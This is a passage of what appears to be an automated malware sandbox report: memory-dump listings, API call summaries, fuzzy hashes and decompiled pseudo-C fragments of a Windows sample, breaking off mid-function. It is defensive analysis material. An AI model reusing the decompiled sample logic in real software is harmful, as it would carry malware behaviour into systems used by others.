                          0x10002629
                          0x00000000
                          0x10002629
                          0x100025f7
                          0x100025f8
                          0x100025fa
                          0x100025fc
                          0x100025fc
                          0x100025fe
                          0x10002600
                          0x10002602
                          0x10002616
                          0x10002616
                          0x10002619
                          0x1000261b
                          0x1000261b
                          0x1000261c
                          0x1000261c
                          0x00000000
                          0x10002604
                          0x10002604
                          0x10002604
                          0x1000260d
                          0x1000260e
                          0x10002610
                          0x10002612
                          0x10002612
                          0x00000000
                          0x10002604
                          0x10002602
                          0x100025de
                          0x100025e5
                          0x100025e5
                          0x100025e7
                          0x00000000
                          0x00000000
                          0x100025e9
                          0x100025ea
                          0x100025ed
                          0x100025ef
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100025ef
                          0x00000000
                          0x100025e5
                          0x10002568
                          0x1000256b
                          0x10002570
                          0x00000000
                          0x00000000
                          0x10002579
                          0x1000257b
                          0x10002581
                          0x00000000
                          0x00000000
                          0x10002587
                          0x1000258d
                          0x00000000
                          0x00000000
                          0x10002593
                          0x10002595
                          0x1000259e
                          0x100025a2
                          0x00000000
                          0x00000000
                          0x100025a8
                          0x100025ab
                          0x100025ad
                          0x00000000
                          0x00000000
                          0x100025b4
                          0x100025b6
                          0x00000000
                          0x00000000
                          0x100025b8
                          0x100025bc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100025bc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100024a7
                          0x100024a7
                          0x100024a7
                          0x100024ae
                          0x00000000
                          0x00000000
                          0x100024b0
                          0x100024b1
                          0x100024b3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x100024b3
                          0x100024db
                          0x100024dd
                          0x00000000
                          0x00000000
                          0x100024ed
                          0x100024ef
                          0x100024f1
                          0x00000000
                          0x00000000
                          0x100024f7
                          0x100024fe
                          0x1000252a
                          0x1000252a
                          0x1000252c
                          0x1000252e
                          0x10002542
                          0x10002544
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10002530
                          0x10002530
                          0x10002530
                          0x10002539
                          0x1000253a
                          0x1000253c
                          0x1000253e
                          0x1000253e
                          0x00000000
                          0x10002530
                          0x10002500
                          0x10002503
                          0x10002505
                          0x10002517
                          0x10002517
                          0x1000251a
                          0x1000251c
                          0x1000251c
                          0x1000251d
                          0x1000251d
                          0x10002523
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10002507
                          0x10002507
                          0x10002507
                          0x1000250e
                          0x00000000
                          0x00000000
                          0x10002510
                          0x10002510
                          0x10002511
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10002511
                          0x10002513
                          0x10002515
                          0x10002528
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10002528
                          0x00000000
                          0x10002515
                          0x10002487
                          0x1000248a
                          0x1000248d
                          0x00000000
                          0x00000000
                          0x1000248f
                          0x10002491
                          0x00000000
                          0x00000000
                          0x00000000
                          0x10002491
                          0x10002456
                          0x10002458
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • NtQueryVirtualMemory.NTDLL ref: 100024C6
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: MemoryQueryVirtual
                          • String ID:
                          • API String ID: 2850889275-0
                          • Opcode ID: 75e1569b4b099f17346d748e674abbc1d8e7c77a6eb8f77402cafd3c7a779976
                          • Instruction ID: f4a1772543a011643d51bf223184fb18b5fe7ce66042f3691ddeabe2b0194e5b
                          • Opcode Fuzzy Hash: 75e1569b4b099f17346d748e674abbc1d8e7c77a6eb8f77402cafd3c7a779976
                          • Instruction Fuzzy Hash: 4561F170A00A528FFB19CF28CCE061973E5EB853D5F228478DA46D729DEB31ED868744
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                          • Instruction ID: 7a7db0da4bdba18d55e661012c65dad4c4a6b0c41c86124266d8f181529a790c
                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                          • Instruction Fuzzy Hash: 0E21B676E002049BCB14EF68C8C09A7BBA5FF4A350B058168ED19DB246D730F915CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E100021F4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                          				intOrPtr _v8;
                          				char _v12;
                          				void* __ebp;
                          				signed int* _t43;
                          				char _t44;
                          				void* _t46;
                          				void* _t49;
                          				intOrPtr* _t53;
                          				void* _t54;
                          				void* _t65;
                          				long _t66;
                          				signed int* _t80;
                          				signed int* _t82;
                          				void* _t84;
                          				signed int _t86;
                          				void* _t89;
                          				void* _t95;
                          				void* _t96;
                          				void* _t99;
                          				void* _t106;
                          
                          				_t43 = _t84;
                          				_t65 = __ebx + 2;
                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                          				_t89 = _t95;
                          				_t96 = _t95 - 8;
                          				_push(_t65);
                          				_push(_t84);
                          				_push(_t89);
                          				asm("cld");
                          				_t66 = _a8;
                          				_t44 = _a4;
                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                          					_push(_t89);
                          					E1000235B(_t66 + 0x10, _t66, 0xffffffff);
                          					_t46 = 1;
                          				} else {
                          					_v12 = _t44;
                          					_v8 = _a12;
                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                          					_t86 =  *(_t66 + 0xc);
                          					_t80 =  *(_t66 + 8);
                          					_t49 = E10002415(_t66);
                          					_t99 = _t96 + 4;
                          					if(_t49 == 0) {
                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                          						goto L11;
                          					} else {
                          						while(_t86 != 0xffffffff) {
                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                          							if(_t53 == 0) {
                          								L8:
                          								_t80 =  *(_t66 + 8);
                          								_t86 = _t80[_t86 + _t86 * 2];
                          								continue;
                          							} else {
                          								_t54 =  *_t53();
                          								_t89 = _t89;
                          								_t86 = _t86;
                          								_t66 = _a8;
                          								_t55 = _t54;
                          								_t106 = _t54;
                          								if(_t106 == 0) {
                          									goto L8;
                          								} else {
                          									if(_t106 < 0) {
                          										_t46 = 0;
                          									} else {
                          										_t82 =  *(_t66 + 8);
                          										E10002300(_t55, _t66);
                          										_t89 = _t66 + 0x10;
                          										E1000235B(_t89, _t66, 0);
                          										_t99 = _t99 + 0xc;
                          										E100023F7(_t82[2]);
                          										 *(_t66 + 0xc) =  *_t82;
                          										_t66 = 0;
                          										_t86 = 0;
                          										 *(_t82[2])(1);
                          										goto L8;
                          									}
                          								}
                          							}
                          							goto L13;
                          						}
                          						L11:
                          						_t46 = 1;
                          					}
                          				}
                          				L13:
                          				return _t46;
                          			}























                          0x100021f8
                          0x100021f9
                          0x100021fa
                          0x100021fd
                          0x100021ff
                          0x10002202
                          0x10002203
                          0x10002205
                          0x10002206
                          0x10002207
                          0x1000220a
                          0x10002214
                          0x100022c5
                          0x100022cc
                          0x100022d5
                          0x1000221a
                          0x1000221a
                          0x10002220
                          0x10002226
                          0x10002229
                          0x1000222c
                          0x10002230
                          0x10002235
                          0x1000223a
                          0x100022ba
                          0x00000000
                          0x1000223c
                          0x1000223c
                          0x10002248
                          0x1000224a
                          0x100022a5
                          0x100022a5
                          0x100022ab
                          0x00000000
                          0x1000224c
                          0x1000225b
                          0x1000225d
                          0x1000225e
                          0x1000225f
                          0x10002262
                          0x10002262
                          0x10002264
                          0x00000000
                          0x10002266
                          0x10002266
                          0x100022b0
                          0x10002268
                          0x10002268
                          0x1000226c
                          0x10002274
                          0x10002279
                          0x1000227e
                          0x1000228a
                          0x10002292
                          0x10002299
                          0x1000229f
                          0x100022a3
                          0x00000000
                          0x100022a3
                          0x10002266
                          0x10002264
                          0x00000000
                          0x1000224a
                          0x100022be
                          0x100022be
                          0x100022be
                          0x1000223a
                          0x100022da
                          0x100022e1

                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                          • Instruction ID: 25800433e26c056fe7322bbf1566a09f1953693f99b8b54d3ef353c25e8b9e3e
                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                          • Instruction Fuzzy Hash: F721DA76900204AFD710DFA8CCC19ABF7A5FF48390B468568ED159B249DB30FA25CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.2420024963.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6949ca7a2556a8c5a2669060fd8d876f0164cf2496b6f49cafe095bf4ddf3f3f
                          • Instruction ID: 5bbe598a151b66b4f147c80d1d7bced19189a4abe25a115b9620d2353dc234ed
                          • Opcode Fuzzy Hash: 6949ca7a2556a8c5a2669060fd8d876f0164cf2496b6f49cafe095bf4ddf3f3f
                          • Instruction Fuzzy Hash: 1D018C34E01109EFCB45DF98C18099DBBB1EB88214B2081AAD849AB306D631AA86CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • StrStrA.SHLWAPI(00000001,001AD240), ref: 001A4808
                          • StrChrA.SHLWAPI(0000002F,0000002F), ref: 001A4823
                          • memcpy.NTDLL(?,?,?,?,?,00000008,?,?,?,001A895C,00000101,?), ref: 001A483C
                          • lstrcpy.KERNEL32(?,00000001), ref: 001A4854
                          • memcpy.NTDLL(00000000,?,00000004,?), ref: 001A48D0
                          • memcpy.NTDLL(00000006,?,00000001,00000000,?,00000004,?), ref: 001A48E6
                          • lstrcpy.KERNEL32(?,?), ref: 001A491A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memcpy$lstrcpy$AllocateHeap
                          • String ID: b+qv
                          • API String ID: 866778428-187815211
                          • Opcode ID: b4a1d8eafbe67fd36ca7baf9aea82576775756c0dfb98253abf376edfb2aea5e
                          • Instruction ID: b741dc59c466b6f577c3a838472bc4ad74246ae59a03617bd09c14404d581c15
                          • Opcode Fuzzy Hash: b4a1d8eafbe67fd36ca7baf9aea82576775756c0dfb98253abf376edfb2aea5e
                          • Instruction Fuzzy Hash: 3051A979900208FFDF12AFA8DC44ADE7BB8EF4A354F1080A5F914AB261C774DA50DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000020,-00000044,00000000,-0000001B,00000001,00000000,001A895C,00000202,00000101,00000008,00000020,00000001), ref: 001A8485
                          • wsprintfA.USER32 ref: 001A84A7
                          • lstrlen.KERNEL32(?), ref: 001A84C9
                          • wsprintfA.USER32 ref: 001A8511
                          • wsprintfA.USER32 ref: 001A855E
                          • memcpy.NTDLL(00000000,?,?), ref: 001A856F
                          • memcpy.NTDLL(?,?,00000002,00000000,?,?), ref: 001A8589
                          • wsprintfA.USER32 ref: 001A85B6
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: wsprintf$Timememcpy$FileSystemlstrlen
                          • String ID:
                          • API String ID: 1849673989-0
                          • Opcode ID: 9c7d44ac436fa186c572ae0e9f5a16e0710da646985f3ad5ba41412911574735
                          • Instruction ID: 359cd7cc39fef9d31ba364e7986a060d200ba1d292983fc127cf73fbc0b11bf9
                          • Opcode Fuzzy Hash: 9c7d44ac436fa186c572ae0e9f5a16e0710da646985f3ad5ba41412911574735
                          • Instruction Fuzzy Hash: D4412BB5A00109AFDB10DF98DC84EAAB7FCFF0A315B194465F909D7212E734EA59CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 001A112E
                            • Part of subcall function 001A7C65: mbstowcs.NTDLL ref: 001AA630
                            • Part of subcall function 001A305D: OpenProcessToken.ADVAPI32(00000101,00020008,00000001,00000000,00000001), ref: 001A307C
                            • Part of subcall function 001A305D: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001A30D7
                            • Part of subcall function 001A305D: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001A30E7
                            • Part of subcall function 001A305D: CloseHandle.KERNEL32(00000001), ref: 001A30FC
                          • CreateEventW.KERNEL32(001AE1E0,00000001,00000000,00000000,?,?,?,00000000,?,00000303,00000001,00000202,00000001,00000101,00000001), ref: 001A12B8
                          • GetLastError.KERNEL32 ref: 001A12C4
                          • SetEvent.KERNEL32(00000000), ref: 001A12D2
                          • Sleep.KERNEL32(000003E8), ref: 001A12DD
                          • ResetEvent.KERNEL32(00000000), ref: 001A12E4
                          • CloseHandle.KERNEL32(00000000), ref: 001A12EB
                            • Part of subcall function 001A4968: lstrlenW.KERNEL32(00000001,00000101,00000001,?,00000000,00000202,00000001,00000101,00000001), ref: 001A4988
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Event$AuthorityCloseHandle$CountCreateErrorLastOpenProcessResetSleepTokenlstrlenmbstowcsmemset
                          • String ID:
                          • API String ID: 2687293994-0
                          • Opcode ID: 7c95eb5a710bdc7dfdb21033fd78d39c3ac93254adf480cb3a3b20e959ef2b7d
                          • Instruction ID: bd5a64900f5cc1873deaeb4812bf401e3520fef7743d2e92e23e6bbe46108a09
                          • Opcode Fuzzy Hash: 7c95eb5a710bdc7dfdb21033fd78d39c3ac93254adf480cb3a3b20e959ef2b7d
                          • Instruction Fuzzy Hash: 8051577A900219AFDF10EFE4D885FEE7BB8BB1A310F144426F602AB191D7719E858B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memcpy.NTDLL(00000001,?,?,?,?,?,?,001AAC48,5120649C,?,-50EADC0C,00000000,00000000,00000001,00000101,00000303), ref: 001A5FBF
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,001AAC48,5120649C,?), ref: 001A5FF5
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001A605A
                          • memset.NTDLL ref: 001A6078
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: ($@
                          • API String ID: 438689982-1311469180
                          • Opcode ID: e64de160b9fdf941db37c25453be0d771578b89ed438daca70e93c1e6ce9ccf1
                          • Instruction ID: 4b904913a80ed35db7d3e25a9fbcb6e4fe63b2b8ca562a370691297f68155025
                          • Opcode Fuzzy Hash: e64de160b9fdf941db37c25453be0d771578b89ed438daca70e93c1e6ce9ccf1
                          • Instruction Fuzzy Hash: D5414EB9A01308AFC710DF68CD89B9ABBF8EF85304F148429F85697345D734EA58CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A7C65: mbstowcs.NTDLL ref: 001AA630
                          • lstrcpyW.KERNEL32(00000000,?), ref: 001A54AE
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 001A54BA
                          • CreateEventW.KERNEL32(001AE1E0,00000001,00000000,00000000,?,001A132B,?,?,?,?,?,?,00000000,?,00000303,00000001), ref: 001A54CE
                          • StrChrW.SHLWAPI(00000101,00000020), ref: 001A54E4
                          • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 001A5510
                          • CloseHandle.KERNEL32(00000000), ref: 001A5540
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: AllocateCloseCreateEventHandleHeapObjectSingleWaitlstrcatlstrcpymbstowcs
                          • String ID:
                          • API String ID: 2006777331-0
                          • Opcode ID: b48a654f7f0b636b34422d7af92a5ea3b47c7efd389cff7b8c6dde90ca76cf06
                          • Instruction ID: 9a509d904be89a64d9a97c1fae00d5f2922c5fd3f87a53189aa0ef16ce29d1aa
                          • Opcode Fuzzy Hash: b48a654f7f0b636b34422d7af92a5ea3b47c7efd389cff7b8c6dde90ca76cf06
                          • Instruction Fuzzy Hash: 9F31E33A900A04BBDB229F64DC45FAE7BBAEF86751F150028F505A7651DB70DE81CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000202,00000000,?,00000000,00000202), ref: 001A6636
                          • StrStrA.SHLWAPI(?,?), ref: 001A6643
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • memcpy.NTDLL(00000000,00000101,00000101,?), ref: 001A6678
                          • memcpy.NTDLL(00000000,00000101,00000101,00000000,00000101,00000101,?), ref: 001A6687
                          • memcpy.NTDLL(00000000,00000101,00000000,00000000,00000101,00000101,00000000,00000101,00000101,?), ref: 001A66A2
                            • Part of subcall function 001A5F31: HeapFree.KERNEL32(00000000,?,001A110F), ref: 001A5F3D
                          • mbstowcs.NTDLL ref: 001A66D0
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memcpy$Heap$AllocateFreelstrlenmbstowcs
                          • String ID:
                          • API String ID: 296427447-0
                          • Opcode ID: 783cb2370d50af3e3d1cce094cde3cb807e28dcbe9d65f73a340f7e6135ff4f5
                          • Instruction ID: e5cd6c27e8ec916ba0310854453889bca7e1bcfd13b9ae5bb55b8fd47063a2b5
                          • Opcode Fuzzy Hash: 783cb2370d50af3e3d1cce094cde3cb807e28dcbe9d65f73a340f7e6135ff4f5
                          • Instruction Fuzzy Hash: C731BFBA900209AFCF119FA8CC45A9FBFB9EF9A354F084044F815A7316C731E915CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,-0000001B,001A4328,00000008,00000020,00000001,00000101,00000202,001A895C), ref: 001A4F05
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • QueryPerformanceFrequency.KERNEL32(?,-00000800), ref: 001A4F40
                          • QueryPerformanceCounter.KERNEL32(?), ref: 001A4F4A
                          • _aulldiv.NTDLL(?,?,?,?), ref: 001A4F5C
                          • _snprintf.NTDLL ref: 001A4FA5
                          • lstrcpy.KERNEL32(00000000,?), ref: 001A4FC4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: PerformanceQuery$AllocateCounterFrequencyHeap_aulldiv_snprintflstrcpylstrlen
                          • String ID:
                          • API String ID: 690042401-0
                          • Opcode ID: ce749b4b321fe555aac348b3c581432653e38c6f5f11bc3e5606999d2cf634a5
                          • Instruction ID: 847326aa75afb254127c484c365a0e49c8b33691ad7201143f552783e19e9a7b
                          • Opcode Fuzzy Hash: ce749b4b321fe555aac348b3c581432653e38c6f5f11bc3e5606999d2cf634a5
                          • Instruction Fuzzy Hash: C821B2B5900609FFDB168F98DC48E7ABBB9FF59304F104428F616D6661CB71E8648B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(?,0035D335,00000000,?,00000000), ref: 001AAB05
                          • GetProcAddress.KERNEL32(00000000), ref: 001AAB0C
                          • memset.NTDLL ref: 001AAB1F
                            • Part of subcall function 001A3398: GetModuleHandleA.KERNEL32(?,0035D30A,001AAB3B,00000000), ref: 001A33BE
                            • Part of subcall function 001A3398: GetProcAddress.KERNEL32(00000000), ref: 001A33C5
                          • GetLastError.KERNEL32(00000001), ref: 001AAB5F
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: AddressHandleModuleProc$ErrorLastmemset
                          • String ID: D
                          • API String ID: 2155554814-2746444292
                          • Opcode ID: dc3f933a452b142903c2a7d023d4354e0715a32be8e4865c9626774b5b77fc86
                          • Instruction ID: d10e2017204e899fe973df9d72828bac382a192dcd72a2a5a184e87f2a706e95
                          • Opcode Fuzzy Hash: dc3f933a452b142903c2a7d023d4354e0715a32be8e4865c9626774b5b77fc86
                          • Instruction Fuzzy Hash: 0011BF76901224BFCB11ABE0DC49EDF3FACEF1B750F140011F60AAA152D7B55A85C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001A5586
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,001A3E84,00000000,?,00000202,001A895C,00000101,?,?,00000000), ref: 001A55E5
                          • Sleep.KERNEL32(00000000,?,?,00000000,?,?,?,?,001A3E84,00000000,?,00000202,001A895C,00000101,?,?), ref: 001A55EF
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,001A3E84,00000000,?,00000202,001A895C,00000101,?,?,00000000), ref: 001A5609
                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,001A3E84,00000000,?,00000202,001A895C,00000101,?,?,00000000), ref: 001A5670
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ErrorLast$AllocateCreateGlobalHeapSleepStream
                          • String ID:
                          • API String ID: 2097901519-0
                          • Opcode ID: 26726184af6de333d7fa21c8229f6f20192a634199b6604dc2b6c40477497da3
                          • Instruction ID: 3f8307b6e9c0b5192a9649c743cb470e89c70745a758dcb03713a6ca4b9e719b
                          • Opcode Fuzzy Hash: 26726184af6de333d7fa21c8229f6f20192a634199b6604dc2b6c40477497da3
                          • Instruction Fuzzy Hash: FB414AB8D04609EFDF10DFA4C984AAEBBBAFF15304F60446AE506E7610D7309A44DF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 001A5E4B
                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001A5E61
                          • memset.NTDLL ref: 001A5F0C
                          • memset.NTDLL ref: 001A5F22
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memset$_allmul_aulldiv
                          • String ID:
                          • API String ID: 3041852380-0
                          • Opcode ID: 3afbd3955d2c6806d655c009929b7173215996e9112511da86245bddbe68819f
                          • Instruction ID: e5cf40786e0f7dfc8ad9c99876e9f820c62b393d58f6bd55fc12e9aac0742752
                          • Opcode Fuzzy Hash: 3afbd3955d2c6806d655c009929b7173215996e9112511da86245bddbe68819f
                          • Instruction Fuzzy Hash: B741F63AB00219AFDB10DF68DC81BEEB3B5EF56310F104569F8199B281DB70AE45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A45B5: RtlImageNtHeader.NTDLL(00000000), ref: 001A4625
                          • GetModuleHandleA.KERNEL32(?,0035D328,00000101,00000001,00000101,00000001,00000000,00000001,00000101,00000303,00000001,00000202,00000001,00000101), ref: 001A3FCB
                          • GetProcAddress.KERNEL32(00000000), ref: 001A3FD2
                          • memcpy.NTDLL(00000000,?,?), ref: 001A3FFD
                          • GetLastError.KERNEL32 ref: 001A403D
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: AddressErrorHandleHeaderImageLastModuleProcmemcpy
                          • String ID:
                          • API String ID: 968891527-0
                          • Opcode ID: 420f1830f7b6ff246d731cef26fbfbcf87d975f2316cd80394f16ec6794b2ce4
                          • Instruction ID: 0d747a80397013bfd449deabb6a56b5bfd794dca1cacb4d31623ef5b18f16d0b
                          • Opcode Fuzzy Hash: 420f1830f7b6ff246d731cef26fbfbcf87d975f2316cd80394f16ec6794b2ce4
                          • Instruction Fuzzy Hash: A621A43A800119BBCB11AFA4DD44CEF7BB9EF86390B054015FD05E7212DB74DA45EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OpenProcessToken.ADVAPI32(00000101,00020008,00000001,00000000,00000001), ref: 001A307C
                          • CloseHandle.KERNEL32(00000001), ref: 001A30FC
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001A30D7
                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001A30E7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Authority$AllocateCloseCountHandleHeapOpenProcessToken
                          • String ID:
                          • API String ID: 1675594182-0
                          • Opcode ID: 31b0f0992f517f26a11e292797d7d97755ac86a23766f500bf9d3a63c7991883
                          • Instruction ID: 7c88e5aec9ac36e24c1a55f6fca3d07073fa466e17742c7c9b2f7eb244523577
                          • Opcode Fuzzy Hash: 31b0f0992f517f26a11e292797d7d97755ac86a23766f500bf9d3a63c7991883
                          • Instruction Fuzzy Hash: 9F212979900208FFDB119FA4DD85DEE7FB9EF49340F004065F91196161D7319B55EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001AB537: lstrlen.KERNEL32(00000000,00000000,00000074,00000000,?,?,?,001AB5DE,?,00000001,00000074,00000000,?,?,001A1963,00000001), ref: 001AB583
                            • Part of subcall function 001A61BD: RtlAllocateHeap.NTDLL(00000000,?,001A10AC), ref: 001A61C9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 001AB619
                            • Part of subcall function 001AB460: lstrlen.KERNEL32(00000000,00000000,00000000,?,001AB628,00000000,00000000,?,?,001A1963,00000001,00000000,00000000,-0000001B,00000020,00000001), ref: 001AB46A
                            • Part of subcall function 001A5F31: HeapFree.KERNEL32(00000000,?,001A110F), ref: 001A5F3D
                          • StrTrimA.SHLWAPI(00000000,001AD23C), ref: 001AB636
                            • Part of subcall function 001AA381: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,001AB643,?,?,001A1963,00000001,00000000,00000000,-0000001B,00000020,00000001), ref: 001AA38B
                            • Part of subcall function 001AA381: _snprintf.NTDLL ref: 001AA3E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcat
                          • String ID: b+qv
                          • API String ID: 1279665018-187815211
                          • Opcode ID: 5fa7f45eab73305859fba025ce7606b68552b582485c2de42acd3ce671d3dd4e
                          • Instruction ID: 943d9748c88859174bb649cca78f136d1e0399f7e6f78b832981906e15fa64db
                          • Opcode Fuzzy Hash: 5fa7f45eab73305859fba025ce7606b68552b582485c2de42acd3ce671d3dd4e
                          • Instruction Fuzzy Hash: 1F11A97BA055256B8B127BB49CC5CAF3A9D9F977603050015F905D7213DF34DD0297E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E10001DDF(void* __esi, void* _a4) {
                          				intOrPtr _v8;
                          				void _v12;
                          				int _v16;
                          				signed int _v20;
                          				int _t45;
                          				intOrPtr _t52;
                          				int _t57;
                          				void _t68;
                          				intOrPtr _t74;
                          				signed int _t79;
                          				int _t80;
                          				intOrPtr* _t82;
                          				int _t85;
                          				int _t91;
                          				void* _t93;
                          				void* _t96;
                          				void* _t98;
                          				signed int _t99;
                          				void* _t103;
                          
                          				_t98 = __esi;
                          				_t45 =  *0x10005000; // 0xaefa8c44
                          				_t1 = _t98 + 0x62; // 0xc015ff56
                          				_t79 =  *_t1 & 0x0000ffff;
                          				_v20 = _t79;
                          				_t80 = _t79 * 0x28;
                          				_v16 = _t45;
                          				_t4 = _t98 + 0x14; // 0xff1075ff
                          				_t93 = _a4;
                          				_t6 = _t98 + 0xc; // 0x4f72f475
                          				memcpy(_t93,  *_t6 + __esi,  *_t4 - _t80);
                          				 *(_t93 + 0x3c) =  *(_t93 + 0x3c) & 0x00000000;
                          				_t9 = _t98 + 0x10; // 0x50fc458d
                          				 *((intOrPtr*)(_t93 + 0x50)) =  *_t9;
                          				_t11 = _t98 + 0x14; // 0xff1075ff
                          				_t52 =  *_t11;
                          				_t12 = _t98 + 0xc; // 0x4f72f475
                          				_t96 = _t52 - _t80 + _a4;
